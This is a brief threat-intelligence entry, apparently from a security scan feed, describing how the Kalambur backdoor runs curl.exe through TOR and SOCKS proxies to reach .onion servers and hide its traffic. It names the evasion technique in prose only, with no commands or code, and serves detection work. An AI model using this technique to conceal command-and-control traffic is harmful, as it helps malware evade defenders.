Intel Name: Kalambur backdoor curl tor socks proxy execution
Date of Scan: February 18, 2025
Impact: Medium
Summary: “Kalambur Backdoor Curl TOR SOCKS Proxy Execution” refers to a method used by the Kalambur backdoor malware where it executes the “curl.exe” command to connect to remote servers via TOR and SOCKS proxies. This behavior typically involves accessing “.onion” domains, often used for anonymized communication. Such activity is indicative of malicious actions, as the malware uses these techniques to hide its communication and evade detection
